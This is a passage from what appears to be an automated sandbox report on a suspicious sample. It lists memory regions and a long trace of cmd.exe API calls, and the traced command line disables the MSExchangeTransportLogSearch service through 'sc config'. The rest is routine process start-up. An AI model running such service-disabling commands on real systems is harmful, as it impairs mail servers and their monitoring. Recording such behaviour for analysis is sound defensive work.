0x7ec7ffff entry_point = 0x0 region_type = private name = "private_0x000000007ec7f000" filename = "" Region: id = 9253 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9254 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9255 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9256 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9257 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9258 start_va = 0x4b10000 end_va = 0x4b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 9259 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9260 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9261 start_va = 0x4c50000 end_va = 0x4d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c50000" filename = "" Region: id = 9262 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9303 start_va = 0x47b0000 end_va = 0x47bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047b0000" filename = "" Region: id = 9304 start_va = 0x4970000 end_va = 0x4a2dfff entry_point = 0x4970000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9305 start_va = 0x4a30000 end_va = 0x4a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 9306 start_va = 0x4ab0000 end_va = 0x4abffff entry_point = 0x0 region_type = private name = "private_0x0000000004ab0000" filename = "" Region: id = 9307 start_va = 0x4b20000 end_va = 0x4c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 9308 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9309 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9310 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9311 start_va = 0x7eb50000 end_va = 0x7ec4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb50000" filename = "" Region: id = 9312 start_va = 0x7ec76000 end_va = 0x7ec78fff entry_point = 0x0 region_type = private name = "private_0x000000007ec76000" filename = "" Region: id = 9313 start_va = 0x47c0000 end_va = 0x47c3fff entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 9314 start_va = 0x47d0000 end_va = 0x47d3fff entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 9315 start_va = 0x4d50000 end_va = 0x5086fff entry_point = 0x4d50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 572 os_tid = 0xd54 [0134.460] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0134.460] __set_app_type (_Type=0x1) [0134.460] __p__fmode () returned 0x77ac4d6c [0134.460] __p__commode () returned 0x77ac5b1c [0134.460] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0134.460] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0134.461] GetCurrentThreadId () returned 0xd54 [0134.461] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd54) returned 0x84 [0134.461] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0134.461] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0134.461] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.463] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0134.463] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x493fd60 | out: phkResult=0x493fd60*=0x0) returned 0x2 [0134.463] VirtualQuery (in: lpAddress=0x493fd67, lpBuffer=0x493fd18, dwLength=0x1c | out: lpBuffer=0x493fd18*(BaseAddress=0x493f000, AllocationBase=0x4840000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.463] VirtualQuery (in: lpAddress=0x4840000, lpBuffer=0x493fd18, dwLength=0x1c | out: lpBuffer=0x493fd18*(BaseAddress=0x4840000, AllocationBase=0x4840000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0134.463] VirtualQuery (in: lpAddress=0x4841000, lpBuffer=0x493fd18, dwLength=0x1c | out: lpBuffer=0x493fd18*(BaseAddress=0x4841000, AllocationBase=0x4840000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0134.463] VirtualQuery (in: lpAddress=0x4843000, lpBuffer=0x493fd18, dwLength=0x1c | out: lpBuffer=0x493fd18*(BaseAddress=0x4843000, AllocationBase=0x4840000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.463] VirtualQuery (in: lpAddress=0x4940000, lpBuffer=0x493fd18, dwLength=0x1c | out: lpBuffer=0x493fd18*(BaseAddress=0x4940000, AllocationBase=0x4940000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0134.463] GetConsoleOutputCP () returned 0x1b5 [0134.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0134.463] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0134.464] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.464] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0134.464] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.464] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0134.464] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.464] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0134.464] _get_osfhandle (_FileHandle=0) returned 0x38 [0134.464] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0134.464] _get_osfhandle (_FileHandle=0) returned 0x38 [0134.464] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0134.464] GetEnvironmentStringsW () returned 0x4c57dc0* [0134.465] FreeEnvironmentStringsA (penv="A") returned 1 [0134.465] GetEnvironmentStringsW () returned 0x4c57dc0* [0134.465] FreeEnvironmentStringsA (penv="A") returned 1 [0134.465] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x493ecc4 | out: phkResult=0x493ecc4*=0x94) returned 0x0 [0134.465] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x493ecc8, lpData=0x493ecd0, lpcbData=0x493eccc*=0x1000 | out: lpType=0x493ecc8*=0x0, lpData=0x493ecd0*=0x10, lpcbData=0x493eccc*=0x1000) returned 0x2 [0134.465] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x493ecc8, lpData=0x493ecd0, lpcbData=0x493eccc*=0x1000 | out: lpType=0x493ecc8*=0x4, lpData=0x493ecd0*=0x1, lpcbData=0x493eccc*=0x4) returned 0x0 [0134.465] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x493ecc8, lpData=0x493ecd0, lpcbData=0x493eccc*=0x1000 | out: lpType=0x493ecc8*=0x0, lpData=0x493ecd0*=0x1, lpcbData=0x493eccc*=0x1000) returned 0x2 [0134.465] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x493ecc8, lpData=0x493ecd0, lpcbData=0x493eccc*=0x1000 | out: lpType=0x493ecc8*=0x4, lpData=0x493ecd0*=0x0, lpcbData=0x493eccc*=0x4) returned 0x0 [0134.465] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x493ecc8, lpData=0x493ecd0, lpcbData=0x493eccc*=0x1000 | out: lpType=0x493ecc8*=0x4, lpData=0x493ecd0*=0x40, lpcbData=0x493eccc*=0x4) returned 0x0 [0134.465] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x493ecc8, lpData=0x493ecd0, lpcbData=0x493eccc*=0x1000 | out: lpType=0x493ecc8*=0x4, lpData=0x493ecd0*=0x40, lpcbData=0x493eccc*=0x4) returned 0x0 [0134.465] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x493ecc8, lpData=0x493ecd0, lpcbData=0x493eccc*=0x1000 | out: lpType=0x493ecc8*=0x0, lpData=0x493ecd0*=0x40, lpcbData=0x493eccc*=0x1000) returned 0x2 [0134.465] RegCloseKey (hKey=0x94) returned 0x0 [0134.465] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x493ecc4 | out: phkResult=0x493ecc4*=0x94) returned 0x0 [0134.465] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x493ecc8, lpData=0x493ecd0, lpcbData=0x493eccc*=0x1000 | out: lpType=0x493ecc8*=0x0, lpData=0x493ecd0*=0x40, lpcbData=0x493eccc*=0x1000) returned 0x2 [0134.465] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x493ecc8, lpData=0x493ecd0, lpcbData=0x493eccc*=0x1000 | out: lpType=0x493ecc8*=0x4, lpData=0x493ecd0*=0x1, lpcbData=0x493eccc*=0x4) returned 0x0 [0134.465] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x493ecc8, lpData=0x493ecd0, lpcbData=0x493eccc*=0x1000 | out: lpType=0x493ecc8*=0x0, lpData=0x493ecd0*=0x1, lpcbData=0x493eccc*=0x1000) returned 0x2 [0134.465] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x493ecc8, lpData=0x493ecd0, lpcbData=0x493eccc*=0x1000 | out: lpType=0x493ecc8*=0x4, lpData=0x493ecd0*=0x0, lpcbData=0x493eccc*=0x4) returned 0x0 [0134.465] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x493ecc8, lpData=0x493ecd0, lpcbData=0x493eccc*=0x1000 | out: lpType=0x493ecc8*=0x4, lpData=0x493ecd0*=0x9, lpcbData=0x493eccc*=0x4) returned 0x0 [0134.465] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x493ecc8, lpData=0x493ecd0, lpcbData=0x493eccc*=0x1000 | out: lpType=0x493ecc8*=0x4, lpData=0x493ecd0*=0x9, lpcbData=0x493eccc*=0x4) returned 0x0 [0134.465] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x493ecc8, lpData=0x493ecd0, lpcbData=0x493eccc*=0x1000 | out: lpType=0x493ecc8*=0x0, lpData=0x493ecd0*=0x9, lpcbData=0x493eccc*=0x1000) returned 0x2 [0134.465] RegCloseKey (hKey=0x94) returned 0x0 [0134.465] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29837 [0134.465] srand (_Seed=0x5ad29837) [0134.465] GetCommandLineW () returned="/c sc config MSExchangeTransportLogSearch start= disabled" [0134.465] GetCommandLineW () returned="/c sc config MSExchangeTransportLogSearch start= disabled" [0134.465] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0134.466] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c59d18, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0134.466] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0134.466] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0134.466] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.466] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0134.466] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0134.466] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0134.466] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0134.466] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0134.466] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0134.466] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0134.466] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0134.466] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0134.466] GetEnvironmentStringsW () returned 0x4c57dc0* [0134.466] FreeEnvironmentStringsA (penv="A") returned 1 [0134.466] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.466] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.466] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0134.466] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0134.466] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0134.466] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0134.466] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0134.466] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0134.466] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0134.466] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0134.466] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x493fa9c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0134.466] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x493fa9c, lpFilePart=0x493fa94 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x493fa94*="Desktop") returned 0x1d [0134.466] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0134.467] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x493f818 | out: lpFindFileData=0x493f818) returned 0x4c505c8 [0134.467] FindClose (in: hFindFile=0x4c505c8 | out: hFindFile=0x4c505c8) returned 1 [0134.467] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x493f818 | out: lpFindFileData=0x493f818) returned 0x4c505c8 [0134.467] FindClose (in: hFindFile=0x4c505c8 | out: hFindFile=0x4c505c8) returned 1 [0134.467] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0134.467] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x493f818 | out: lpFindFileData=0x493f818) returned 0x4c505c8 [0134.467] FindClose (in: hFindFile=0x4c505c8 | out: hFindFile=0x4c505c8) returned 1 [0134.467] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0134.467] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0134.467] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0134.467] GetEnvironmentStringsW () returned 0x4c57dc0* [0134.467] FreeEnvironmentStringsA (penv="=") returned 1 [0134.467] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0134.467] GetConsoleOutputCP () returned 0x1b5 [0134.468] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0134.468] GetUserDefaultLCID () returned 0x409 [0134.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0134.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x493fbcc, cchData=128 | out: lpLCData="0") returned 2 [0134.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x493fbcc, cchData=128 | out: lpLCData="0") returned 2 [0134.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x493fbcc, cchData=128 | out: lpLCData="1") returned 2 [0134.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0134.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0134.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0134.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0134.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0134.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0134.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0134.468] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0134.468] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0134.468] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0134.468] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0134.469] GetConsoleTitleW (in: lpConsoleTitle=0x4c5aa80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.469] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0134.469] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0134.469] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0134.469] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0134.470] _wcsicmp (_String1="sc", _String2=")") returned 74 [0134.470] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0134.470] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0134.470] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0134.470] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0134.470] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0134.470] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0134.471] GetConsoleTitleW (in: lpConsoleTitle=0x493f8b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.471] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0134.471] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0134.471] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0134.471] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0134.471] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0134.471] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0134.471] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0134.471] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0134.471] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0134.471] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0134.471] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0134.471] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0134.471] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0134.471] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0134.471] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0134.471] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0134.471] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0134.471] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0134.471] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0134.471] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0134.472] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0134.472] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0134.472] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0134.472] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0134.472] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0134.472] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0134.472] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0134.472] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0134.472] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0134.472] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0134.472] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0134.472] _wcsicmp (_String1="sc", _String2="START") returned -17 [0134.472] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0134.472] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0134.472] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0134.472] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0134.472] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0134.472] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0134.472] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0134.472] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0134.472] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0134.472] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0134.472] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0134.472] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0134.472] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0134.472] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0134.472] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0134.472] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0134.472] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0134.472] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0134.472] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0134.472] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0134.472] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0134.472] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0134.472] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0134.472] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0134.472] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0134.472] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0134.472] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0134.472] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0134.472] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0134.472] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0134.472] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0134.472] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0134.472] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0134.472] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0134.472] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0134.472] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0134.472] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0134.472] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0134.472] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0134.472] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0134.472] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0134.472] _wcsicmp (_String1="sc", _String2="START") returned -17 [0134.472] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0134.472] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0134.472] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0134.472] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0134.472] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0134.472] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0134.472] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0134.473] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0134.473] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0134.473] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0134.473] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0134.473] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0134.473] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0134.473] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0134.473] SetErrorMode (uMode=0x0) returned 0x0 [0134.473] SetErrorMode (uMode=0x1) returned 0x0 [0134.473] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4c58dd0, lpFilePart=0x493f3c4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x493f3c4*="Desktop") returned 0x1d [0134.473] SetErrorMode (uMode=0x0) returned 0x1 [0134.473] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0134.473] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0134.480] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0134.480] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0134.480] GetConsoleTitleW (in: lpConsoleTitle=0x493f644, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.481] InitializeProcThreadAttributeList (in: lpAttributeList=0x493f570, 